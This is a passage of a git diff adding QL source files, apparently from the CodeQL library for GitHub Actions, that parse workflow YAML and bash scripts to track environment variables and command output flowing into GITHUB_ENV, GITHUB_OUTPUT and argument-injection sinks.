"(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + content = script.regexpCapture(regexp, 6) and + filters = "" + or + regexp = + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 7)) and + filters = script.regexpCapture(regexp, 4) and + content = script.regexpCapture(regexp, 8) + ) + } + + bindingset[script] + predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp, string var_name | + regexp = + "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + + "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + var_name = trimQuotes(script.regexpCapture(regexp, 3)).regexpReplaceAll("<<\\s*(\\S+)", "") and + content = + var_name + "=$(" + + trimQuotes(script.regexpCapture(regexp, 6)) + .regexpReplaceAll(">>.*GITHUB_(ENV|OUTPUT)(})?", "") + .trim() + ")" and + cmd = "echo" and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" + ) + } + + bindingset[script] + predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp, string first_line, string var_name | + regexp = + "(?msi).*^\\s*\\{\\s*[\r\n]" + + // + "(.*?)" + + // + "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and + first_line = script.regexpCapture(regexp, 1).splitAt("\n", 0).trim() and + var_name = first_line.regexpCapture("echo\\s+('|\\\")?(.*)<<.*", 2) and + content = var_name + "=$(" + script.regexpCapture(regexp, 1).splitAt("\n").trim() + ")" and + not content.indexOf("EOF") > 0 and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + cmd = "echo" and + filters = "" + ) + } + + bindingset[script] + predicate multiLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + heredocFileWrite(script, cmd, file, content, filters) + or + linesFileWrite(script, cmd, file, content, filters) + or + blockFileWrite(script, cmd, file, content, filters) + } + + bindingset[file_var] + predicate extractFileWrite(BashShellScript script, string file_var, string content) { + // single line assignment + exists(string file_expr, string raw_content | + isParameterExpansion(file_expr, file_var, _, _) and + singleLineFileWrite(script.getAStmt(), _, file_expr, raw_content, _) and + content = trimQuotes(raw_content) + ) + or + // workflow command assignment + exists(string key, string value, string cmd | + ( + file_var = "GITHUB_ENV" and + cmd = "set-env" and + content = key + "=" + value + or + file_var = "GITHUB_OUTPUT" and + cmd = "set-output" and + content = key + "=" + value + or + file_var = "GITHUB_PATH" and + cmd = "add-path" and + content = value + ) and + singleLineWorkflowCmd(script.getAStmt(), cmd, key, value) + ) + or + // multiline assignment + exists(string file_expr, string raw_content | + multiLineFileWrite(script.getRawScript(), _, file_expr, raw_content, _) and + isParameterExpansion(file_expr, file_var, _, _) and + content = trimQuotes(raw_content) + ) + } + + /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ + predicate fileToFileWrite(BashShellScript script, string file_var, string path) { + exists(string regexp, string stmt, string file_expr | + regexp = + "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and + stmt = script.getAStmt() and + file_expr = trimQuotes(stmt.regexpCapture(regexp, 5)) and + path = stmt.regexpCapture(regexp, 2) and + containsParameterExpansion(file_expr, file_var, _, _) + ) + } + + /** + * Holds if the Run scripts contains an access to an environment variable called `var` + * which value may get appended to the GITHUB_XXX special file + */ + predicate envReachingGitHubFileWrite( + BashShellScript script, string var, string file_var, string field + ) { + exists(string file_write_value | + ( + file_var = "GITHUB_ENV" and + script.getAWriteToGitHubEnv(field, file_write_value) + or + file_var = "GITHUB_OUTPUT" and + script.getAWriteToGitHubOutput(field, file_write_value) + or + file_var = "GITHUB_PATH" and + field = "PATH" and + script.getAWriteToGitHubPath(file_write_value) + ) and + envReachingRunExpr(script, var, file_write_value) + ) + } + + /** + * Holds if and environment variable is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. + */ + bindingset[expr] + predicate envReachingRunExpr(BashShellScript script, string var, string expr) { + exists(string var2, string value2 | + // VAR2=${VAR:-default} (var2=value2) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + script.getAnAssignment(var2, value2) and + containsParameterExpansion(value2, var, _, _) and + containsParameterExpansion(expr, var2, _, _) + ) + or + // var reaches the file write directly + // echo "FIELD=${VAR:-default}" >> $GITHUB_ENV (field, file_write_value) + containsParameterExpansion(expr, var, _, _) + } + + /** + * Holds if the Run scripts contains a command substitution (`cmd`) + * which output may get appended to the GITHUB_XXX special file + */ + predicate cmdReachingGitHubFileWrite( + BashShellScript script, string cmd, string file_var, string field + ) { + exists(string file_write_value | + ( + file_var = "GITHUB_ENV" and + script.getAWriteToGitHubEnv(field, file_write_value) + or + file_var = "GITHUB_OUTPUT" and + script.getAWriteToGitHubOutput(field, file_write_value) + or + file_var = "GITHUB_PATH" and + field = "PATH" and + script.getAWriteToGitHubPath(file_write_value) + ) and + cmdReachingRunExpr(script, cmd, file_write_value) + ) + } + + predicate envReachingArgumentInjectionSink( + BashShellScript script, string source, string command, string argument + ) { + exists(string cmd, string regex, int command_group, int argument_group | + cmd = script.getACommand() and + argumentInjectionSinksDataModel(regex, command_group, argument_group) and + argument = cmd.regexpCapture(regex, argument_group).trim() and + command = cmd.regexpCapture(regex, command_group).trim() and + envReachingRunExpr(script, source, argument) + ) + } + + predicate cmdReachingArgumentInjectionSink( + BashShellScript script, string source, string command, string argument + ) { + exists(string cmd, string regex, int command_group, int argument_group | + cmd = script.getACommand() and + argumentInjectionSinksDataModel(regex, command_group, argument_group) and + argument = cmd.regexpCapture(regex, argument_group).trim() and + command = cmd.regexpCapture(regex, command_group).trim() and + cmdReachingRunExpr(script, source, argument) + ) + } + + /** + * Holds if a command output is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. + */ + bindingset[expr] + predicate cmdReachingRunExpr(BashShellScript script, string cmd, string expr) { + // cmd output is assigned to a second variable (var2) and var2 reaches the file write + exists(string var2, string value2 | + // VAR2=$(cmd) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + script.getAnAssignment(var2, value2) and + containsCmdSubstitution(value2, cmd) and + containsParameterExpansion(expr, var2, _, _) and + not varMatchesRegexTest(script, var2, alphaNumericRegex()) + ) + or + // var reaches the file write directly + // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) + containsCmdSubstitution(expr, cmd) + } + + /** + * Holds if there test command that checks a variable against a regex + * eg: `[[ $VAR =~ ^[a-zA-Z0-9_]+$ ]]` + */ + bindingset[var, regex] + predicate varMatchesRegexTest(BashShellScript script, string var, string regex) { + exists(string lhs, string rhs | + lhs = script.getACommand().regexpCapture(".*\\[\\[\\s*(.*?)\\s*=~\\s*(.*?)\\s*\\]\\].*", 1) and + containsParameterExpansion(lhs, var, _, _) and + rhs = script.getACommand().regexpCapture(".*\\[\\[\\s*(.*?)\\s*=~\\s*(.*?)\\s*\\]\\].*", 2) and + trimQuotes(rhs).regexpMatch(regex) + ) + } + + /** + * Holds if the given regex is used to match an alphanumeric string + * eg: `^[0-9a-zA-Z]{40}$`, `^[0-9]+$` or `^[a-zA-Z0-9_]+$` + */ + string alphaNumericRegex() { result = "^\\^\\[([09azAZ_-]+)\\](\\+|\\{\\d+\\})\\$$" } +} diff --git a/actions/ql/lib/codeql/actions/Cfg.qll b/actions/ql/lib/codeql/actions/Cfg.qll new file mode 100644 index 000000000000..8ccc8de1d445 --- /dev/null +++ b/actions/ql/lib/codeql/actions/Cfg.qll @@ -0,0 +1,6 @@ +/** Provides classes representing the control flow graph. */ + +private import codeql.actions.controlflow.internal.Cfg as CfgInternal +import CfgInternal::Completion +import CfgInternal::CfgScope +import CfgInternal::CfgImpl diff --git a/actions/ql/lib/codeql/actions/Consistency.ql b/actions/ql/lib/codeql/actions/Consistency.ql new file mode 100644 index 000000000000..a799ffce3a3a --- /dev/null +++ b/actions/ql/lib/codeql/actions/Consistency.ql @@ -0,0 +1 @@ +import DataFlow::DataFlow::Consistency diff --git a/actions/ql/lib/codeql/actions/DataFlow.qll b/actions/ql/lib/codeql/actions/DataFlow.qll new file mode 100644 index 000000000000..feafe4f68bb0 --- /dev/null +++ b/actions/ql/lib/codeql/actions/DataFlow.qll @@ -0,0 +1,22 @@ +/** + * Provides classes for performing local (intra-procedural) and + * global (inter-procedural) data flow analyses. + */ + +import codeql.Locations + +module DataFlow { + private import codeql.dataflow.DataFlow + private import codeql.actions.dataflow.internal.DataFlowImplSpecific + import DataFlowMake + import codeql.actions.dataflow.internal.DataFlowPublic + // debug + private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific + import codeql.dataflow.internal.DataFlowImplConsistency as DFIC + + module ActionsConsistency implements DFIC::InputSig { } + + module Consistency { + import DFIC::MakeConsistency + } +} diff --git a/actions/ql/lib/codeql/actions/Helper.qll b/actions/ql/lib/codeql/actions/Helper.qll new file mode 100644 index 000000000000..48b70061ec0f --- /dev/null +++ b/actions/ql/lib/codeql/actions/Helper.qll @@ -0,0 +1,88 @@ +private import codeql.actions.Ast +private import codeql.Locations +private import codeql.actions.security.ControlChecks +import codeql.actions.config.Config +import codeql.actions.Bash +import codeql.actions.PowerShell + +bindingset[expr] +string normalizeExpr(string expr) { + result = + expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") + .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") + .regexpReplaceAll("\\s*\\.\\s*", ".") +} + +bindingset[regex] +string wrapRegexp(string regex) { result = "\\b" + regex + "\\b" } + +bindingset[regex] +string wrapJsonRegexp(string regex) { + result = ["fromJSON\\(\\s*" + regex + "\\s*\\)", "toJSON\\(\\s*" + regex + "\\s*\\)"] +} + +bindingset[str] +string trimQuotes(string str) { + result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") +} + +predicate inPrivilegedContext(AstNode node, Event event) { + node.getEnclosingJob().isPrivilegedExternallyTriggerable(event) +} + +predicate inNonPrivilegedContext(AstNode node) { + not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_) +} + +string defaultBranchNames() { + repositoryDataModel(_, result) + or + not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and + result = ["main", "master"] +} + +string getRepoRoot() { + exists(Workflow w | + w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and + result = + w.getLocation() + .getFile() + .getRelativePath() + .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and + // exclude workflow_enum reusable workflows directory root + not result.indexOf(".github/workflows/external/") > -1 and + not result.indexOf(".github/actions/external/") > -1 + or + not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and + not w.getLocation().getFile().getRelativePath().indexOf(".github/workflows/external/") > -1 and + not w.getLocation().getFile().getRelativePath().indexOf(".github/actions/external/") > -1 and + result = "" + ) +} + +bindingset[path] +string normalizePath(string path) { + exists(string trimmed_path | trimmed_path = trimQuotes(path) | + // ./foo -> GITHUB_WORKSPACE/foo + if path.indexOf("./") = 0 + then result = path.replaceAll("./", "GITHUB_WORKSPACE/") + else + // GITHUB_WORKSPACE/foo -> GITHUB_WORKSPACE/foo + if path.indexOf("GITHUB_WORKSPACE/") = 0 + then result = path + else + // foo -> GITHUB_WORKSPACE/foo + if path.regexpMatch("^[^/~].*") + then result = "GITHUB_WORKSPACE/" + path.regexpReplaceAll("/$", "") + else + // ~/foo -> ~/foo + // /foo -> /foo + result = path + ) +} + +/** + * Holds if the path cache_path is a subpath of the path untrusted_path. + */ +bindingset[subpath, path] +predicate isSubpath(string subpath, string path) { subpath.substring(0, path.length()) = path } diff --git a/actions/ql/lib/codeql/actions/PowerShell.qll b/actions/ql/lib/codeql/actions/PowerShell.qll new file mode 100644 index 000000000000..3ae706970fa7 --- /dev/null +++ b/actions/ql/lib/codeql/actions/PowerShell.qll @@ -0,0 +1,62 @@ +private import codeql.actions.Ast + +class PowerShellScript extends ShellScript { + PowerShellScript() { + exists(Run run | + this = run.getScript() and + run.getShell().matches("pwsh%") + ) + } + + override string getStmt(int i) { none() } + + override string getAStmt() { none() } + + override string getCommand(int i) { none() } + + override string getACommand() { none() } + + override string getFileReadCommand(int i) { none() } + + override string getAFileReadCommand() { none() } + + override predicate getAssignment(int i, string name, string data) { none() } + + override predicate getAnAssignment(string name, string data) { none() } + + override predicate getAWriteToGitHubEnv(string name, string data) { none() } + + override predicate getAWriteToGitHubOutput(string name, string data) { none() } + + override predicate getAWriteToGitHubPath(string data) { none() } + + override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { none() } + + override predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { none() } + + override predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { none() } + + override predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { none() } + + override predicate getAnEnvReachingGitHubPathWrite(string var) { none() } + + override predicate getACmdReachingGitHubPathWrite(string cmd) { none() } + + override predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ) { + none() + } + + override predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ) { + none() + } + + override predicate fileToGitHubEnv(string path) { none() } + + override predicate fileToGitHubOutput(string path) { none() } + + override predicate fileToGitHubPath(string path) { none() } +} diff --git a/actions/ql/lib/codeql/actions/TaintTracking.qll b/actions/ql/lib/codeql/actions/TaintTracking.qll new file mode 100644 index 000000000000..8203a54dfebd --- /dev/null +++ b/actions/ql/lib/codeql/actions/TaintTracking.qll @@ -0,0 +1,13 @@ +/** + * Provides classes for performing local (intra-procedural) and + * global (inter-procedural) taint-tracking analyses. + */ + +import codeql.Locations + +module TaintTracking { + private import codeql.actions.dataflow.internal.DataFlowImplSpecific + private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific + private import codeql.dataflow.TaintTracking + import TaintFlowMake +} diff --git a/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll b/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll new file mode 100644 index 000000000000..9bd9bd34dd44 --- /dev/null +++ b/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll @@ -0,0 +1,32 @@ +private import actions + +/** + * Holds if workflow step uses the github/codeql-action/init action with no customizations. + * e.g. + * - name: Initialize + * uses: github/codeql-action/init@v2 + * with: + * languages: ruby, javascript + */ +class DefaultableCodeQLInitiatlizeActionQuery extends UsesStep { + DefaultableCodeQLInitiatlizeActionQuery() { + this.getCallee() = "github/codeql-action/init" and + not customizedWorkflowStep(this) + } +} + +/** + * Holds if the with: part of the workflow step contains any arguments for with: other than "languages". + * e.g. + * - name: Initialize CodeQL + * uses: github/codeql-action/init@v3 + * with: + * languages: ${{ matrix.language }} + * config-file: ./.github/codeql/${{ matrix.language }}/codeql-config.yml + */ +predicate customizedWorkflowStep(UsesStep codeQLInitStep) { + exists(string arg | + exists(codeQLInitStep.getArgument(arg)) and + arg != "languages" + ) +} diff --git a/actions/ql/lib/codeql/actions/ast/internal/Ast.qll b/actions/ql/lib/codeql/actions/ast/internal/Ast.qll new file mode 100644 index 000000000000..b0cbb8a1d79e --- /dev/null +++ b/actions/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -0,0 +1,1924 @@ +private import codeql.actions.ast.internal.Yaml +private import codeql.Locations +private import codeql.actions.Helper +private import codeql.actions.config.Config +private import codeql.actions.DataFlow + +bindingset[text] +int numberOfLines(string text) { result = max(int i | exists(text.splitAt("\n", i))) } + +/** + * Gets the length of each line in the StringValue . + */ +bindingset[text] +int lineLength(string text, int i) { result = text.splitAt("\n", i).length() + 1 } + +/** + * Gets the sum of the length of the lines up to the given index. + */ +bindingset[text] +int partialLineLengthSum(string text, int i) { + i in [0 .. numberOfLines(text)] and + result = sum(int j, int length | j in [0 .. i] and length = lineLength(text, j) | length) +} + +string getADelimitedExpression(YamlString s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.getValue() + .regexpFind("\\$\\{\\{(?:[^}]|}(?!}))*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{(?:[^}]|}(?!}))*\\}\\})", 1) + .trim() +} + +private newtype TAstNode = + TExpressionNode(YamlNode key, YamlScalar value, string raw, int exprOffset) { + raw = getADelimitedExpression(value, exprOffset) and + exists(YamlMapping m | + ( + exists(int i | value = m.getValueNode(i) and key = m.getKeyNode(i)) + or + exists(int i | + m.getValueNode(i).(YamlSequence).getElementNode(_) = value and key = m.getKeyNode(i) + ) + ) + ) + or + // `if`'s conditions do not need to be delimted with ${{}} + exists(YamlMapping m | + m.maps(key, value) and + key.(YamlScalar).getValue() = ["if"] and + value.getValue() = raw and + exprOffset = 1 + ) + } or + TCompositeAction(YamlMapping n) { + n instanceof YamlDocument and + n.getFile().getBaseName() = ["action.yml", "action.yaml"] and + n.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + } or + TWorkflowNode(YamlMapping n) { + n instanceof YamlDocument and + n.lookup("jobs") instanceof YamlMapping + } or + TRunsNode(YamlMapping n) { exists(CompositeActionImpl a | a.getNode().lookup("runs") = n) } or + TDefaultsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("defaults") = n) } or + TInputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("inputs") = n) } or + TInputNode(YamlValue n) { exists(YamlMapping m | m.lookup("inputs").(YamlMapping).maps(n, _)) } or + TOutputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("outputs") = n) } or + TPermissionsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("permissions") = n) } or + TStrategyNode(YamlMapping n) { exists(YamlMapping m | m.lookup("strategy") = n) } or + TNeedsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("needs") = n) } or + TJobNode(YamlMapping n) { exists(YamlMapping w | w.lookup("jobs").(YamlMapping).lookup(_) = n) } or + TOnNode(YamlMappingLikeNode n) { exists(YamlMapping w | w.lookup("on") = n) } or + TEventNode(YamlScalar event, YamlMappingLikeNode n) { + exists(OnImpl o | + o.getNode().(YamlMapping).maps(event, n) + or + o.getNode().(YamlSequence).getAChildNode() = event and event = n + or + o.getNode().(YamlScalar) = n and event = n + ) + } or + TStepNode(YamlMapping n) { + exists(YamlMapping m | m.lookup("steps").(YamlSequence).getElementNode(_) = n) + } or + TIfNode(YamlValue n) { exists(YamlMapping m | m.lookup("if") = n) } or + TEnvironmentNode(YamlValue n) { exists(YamlMapping m | m.lookup("environment") = n) } or + TEnvNode(YamlMapping n) { exists(YamlMapping m | m.lookup("env") = n) } or + TScalarValueNode(YamlScalar n) { + exists(YamlMapping m | m.maps(_, n) or m.lookup(_).(YamlSequence).getElementNode(_) = n) + } + +abstract class AstNodeImpl extends TAstNode { + abstract AstNodeImpl getAChildNode(); + + abstract AstNodeImpl getParentNode(); + + abstract string getAPrimaryQlClass(); + + abstract Location getLocation(); + + abstract YamlNode getNode(); + + abstract string toString(); + + /** + * Gets the enclosing Job. + */ + JobImpl getEnclosingJob() { + result.getAChildNode*() = this.getParentNode() or + result = this.getEnclosingCompositeAction().getACallerJob() + } + + /** + * Gets and Event triggering this node. + */ + EventImpl getATriggerEvent() { + result = this.getEnclosingJob().getATriggerEvent() + or + not exists(this.getEnclosingJob()) and result = this.getEnclosingWorkflow().getATriggerEvent() + } + + /** + * Gets the enclosing Step. + */ + StepImpl getEnclosingStep() { + if this instanceof StepImpl + then result = this + else + if this instanceof ScalarValueImpl + then result.getAChildNode*() = this.getParentNode() + else none() + } + + /** + * Gets the enclosing workflow if any. + */ + WorkflowImpl getEnclosingWorkflow() { this = result.getAChildNode*() } + + /** + * Gets the enclosing composite action if any. + */ + CompositeActionImpl getEnclosingCompositeAction() { this = result.getAChildNode*() } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + ExpressionImpl getInScopeEnvVarExpr(string name) { + exists(EnvImpl env | + env.getNode().maps(any(YamlScalar s | s.getValue() = name), result.getParentNode().getNode()) and + env.getParentNode().getAChildNode*() = this + ) + } + + ScalarValueImpl getInScopeDefaultValue(string name, string prop) { + exists(DefaultsImpl dft | + this.getEnclosingJob().getNode().(YamlMapping).maps(_, dft.getNode()) and + result = dft.getValue(name, prop) + ) + or + not exists(DefaultsImpl dft | this.getEnclosingJob() = dft.getParentNode()) and + exists(DefaultsImpl dft | + this.getEnclosingWorkflow().getNode().(YamlMapping).maps(_, dft.getNode()) and + result = dft.getValue(name, prop) + ) + } +} + +class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { + YamlScalar value; + + ScalarValueImpl() { this = TScalarValueNode(value) } + + override string toString() { result = value.getValue() } + + override ExpressionImpl getAChildNode() { result.getParentNode() = this } + + override AstNodeImpl getParentNode() { + exists(AstNodeImpl n | n.getAChildNode() = this and result = n) + } + + override string getAPrimaryQlClass() { result = "ScalarValueImpl" } + + override Location getLocation() { result = value.getLocation() } + + override YamlScalar getNode() { result = value } + + string getValue() { result = value.getValue() } +} + +class ShellScriptImpl extends ScalarValueImpl { + ShellScriptImpl() { exists(YamlMapping run | run.lookup("run").(YamlScalar) = this.getNode()) } + + string getRawScript() { result = this.getValue().regexpReplaceAll("\\\\\\s*\n", "") } + + RunImpl getEnclosingRun() { result.getNode().lookup("run") = this.getNode() } + + abstract string getStmt(int i); + + abstract string getAStmt(); + + abstract string getCommand(int i); + + string getACommand() { + if this.getEnclosingRun().getShell().matches("bash%") + then result = this.(BashShellScript).getACommand() + else + if this.getEnclosingRun().getShell().matches("pwsh%") + then result = this.(PowerShellScript).getACommand() + else result = "NOT IMPLEMENTED" + } + + abstract string getFileReadCommand(int i); + + abstract string getAFileReadCommand(); + + abstract predicate getAssignment(int i, string name, string data); + + abstract predicate getAnAssignment(string name, string data); + + abstract predicate getAWriteToGitHubEnv(string name, string data); + + abstract predicate getAWriteToGitHubOutput(string name, string data); + + abstract predicate getAWriteToGitHubPath(string data); + + abstract predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field); + + abstract predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field); + + abstract predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field); + + abstract predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field); + + abstract predicate getAnEnvReachingGitHubPathWrite(string var); + + abstract predicate getACmdReachingGitHubPathWrite(string cmd); + + abstract predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ); + + abstract predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ); + + abstract predicate fileToGitHubEnv(string path); + + abstract predicate fileToGitHubOutput(string path); + + abstract predicate fileToGitHubPath(string path); +} + +class ExpressionImpl extends AstNodeImpl, TExpressionNode { + YamlNode key; + YamlString value; + string rawExpression; + string fullExpression; + int exprOffset; + + ExpressionImpl() { + this = TExpressionNode(key, value, rawExpression, exprOffset - 1) and + if rawExpression.trim().regexpMatch("\\$\\{\\{.*\\}\\}") + then + fullExpression = rawExpression.trim().regexpCapture("\\$\\{\\{\\s*(.*)\\s*\\}\\}", 1).trim() + else fullExpression = rawExpression.trim() + } + + override string toString() { result = fullExpression } + + override AstNodeImpl getAChildNode() { none() } + + override ScalarValueImpl getParentNode() { result.getNode() = value } + + override string getAPrimaryQlClass() { result = "ExpressionImpl" } + + override YamlNode getNode() { none() } + + string getExpression() { result = fullExpression } + + string getFullExpression() { result = fullExpression } + + string getRawExpression() { result = rawExpression } + + /** + * Gets the absolute coordinates of the expression. + */ + predicate expressionLocation(int sl, int sc, int el, int ec) { + exists(int lineDiff, string text, string style, Location loc | + text = value.getValue() and + loc = value.getLocation() and + lineDiff = loc.getEndLine() - loc.getStartLine() and + style = value.getStyle() + | + // eg: + // - run: echo "hello" + // - run: 'echo "hello"' + // - run: "echo 'hello'" + style = ["", "\"", "'"] and + lineDiff = 0 and + sl = loc.getStartLine() and + el = sl and + sc = loc.getStartColumn() + exprOffset and + ec = sc + rawExpression.length() - 1 + or + // eg: + // - run: "echo 'hello' + // echo 'hello'" + // - run: "echo 'hello' + // echo 'hello' + // echo 'hello'" + style = ["", "\"", "'"] and + lineDiff > 0 and + sl = loc.getStartLine() and + el = loc.getEndLine() and + sc = loc.getStartColumn() and + ec = loc.getEndColumn() + or + // eg: + // - run: | + // echo "hello" + // - run: | + // echo "hello" + // echo "bye" + style = "|" and + exists(int r | + ( + r > 0 and + partialLineLengthSum(text, r - 1) < exprOffset and + partialLineLengthSum(text, r) >= exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = + key.getLocation().getStartColumn() + exprOffset - partialLineLengthSum(text, r - 1) + 2 - + 1 and + ec = sc + rawExpression.length() - 1 + or + r = 0 and + partialLineLengthSum(text, r) > exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = key.getLocation().getStartColumn() + 2 + exprOffset and + ec = sc + rawExpression.length() - 1 + ) + ) + or + // eg: + // - run: > + // echo "hello" + // - run: > + // echo "hello" + // echo "hello" + style = ">" and + sl = loc.getStartLine() + 1 and + el = loc.getEndLine() and + sc = key.getLocation().getStartColumn() and + ec = loc.getEndColumn() + ) + } + + override Location getLocation() { + exists(Location loc | + this.hasLocationInfo(loc.getFile().getAbsolutePath(), loc.getStartLine(), + loc.getStartColumn(), loc.getEndLine(), loc.getEndColumn()) and + result = loc + ) + } + + predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { + path = value.getFile().getAbsolutePath() and + this.expressionLocation(sl, sc, el, ec) + } +} + +class CompositeActionImpl extends AstNodeImpl, TCompositeAction { + YamlMapping n; + + CompositeActionImpl() { this = TCompositeAction(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { none() } + + override string getAPrimaryQlClass() { result = "CompositeActionImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + RunsImpl getRuns() { result.getNode() = n.lookup("runs") } + + OutputsImpl getOutputs() { result.getNode() = n.lookup("outputs") } + + ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + InputsImpl getInputs() { result.getNode() = n.lookup("inputs") } + + InputImpl getAnInput() { n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) } + + InputImpl getInput(string name) { + n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) and + result.getNode().getValue() = name + } + + LocalJobImpl getACallerJob() { result = this.getACallerStep().getEnclosingJob() } + + UsesStepImpl getACallerStep() { + exists(DataFlow::CallNode call | + call.getCalleeNode() = this and + result = call.getCfgNode().getAstNode() + ) + } + + string getResolvedPath() { + result = + ["", "./"] + + this.getLocation() + .getFile() + .getRelativePath() + .replaceAll(getRepoRoot(), "") + .replaceAll("/action.yml", "") + .replaceAll("/action.yaml", "") + .replaceAll(".github/actions/external/", "") + } + + private predicate hasExplicitSecretAccess() { + // the job accesses a secret other than GITHUB_TOKEN + exists(SecretsExpressionImpl expr | + expr.getEnclosingCompositeAction() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + } + + private predicate hasExplicitWritePermission() { + // a calling job has an explicit write permission + this.getACallerJob().getPermissions().getAPermission().matches("%write") + } + + /** Holds if the action is privileged. */ + predicate isPrivileged() { + // there is a calling job that defines explicit write permissions + this.hasExplicitWritePermission() + or + // the actions has an explicit secret accesses + this.hasExplicitSecretAccess() + or + // there is a privileged caller job + ( + this.getACallerJob().isPrivileged() + or + not this.getACallerJob().isPrivileged() and + this.getACallerJob().getATriggerEvent().isPrivileged() + ) + } + + override EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } +} + +class WorkflowImpl extends AstNodeImpl, TWorkflowNode { + YamlMapping n; + + WorkflowImpl() { this = TWorkflowNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { none() } + + override string getAPrimaryQlClass() { result = "WorkflowImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets the `on` trigger events for this workflow. */ + OnImpl getOn() { result.getNode() = n.lookup("on") } + + /** Gets the 'global' `env` mapping in this workflow. */ + EnvImpl getEnv() { result.getNode() = n.lookup("env") } + + /** Gets the name of the workflow. */ + string getName() { result = n.lookup("name").(YamlString).getValue() } + + /** Gets the job within this workflow with the given job ID. */ + JobImpl getJob(string jobId) { result.getEnclosingWorkflow() = this and result.getId() = jobId } + + /** Gets a job within this workflow */ + JobImpl getAJob() { result.getEnclosingWorkflow() = this } + + /** Gets the permissions granted to this workflow. */ + PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + + /** Gets the trigger event that starts this workflow. */ + override EventImpl getATriggerEvent() { 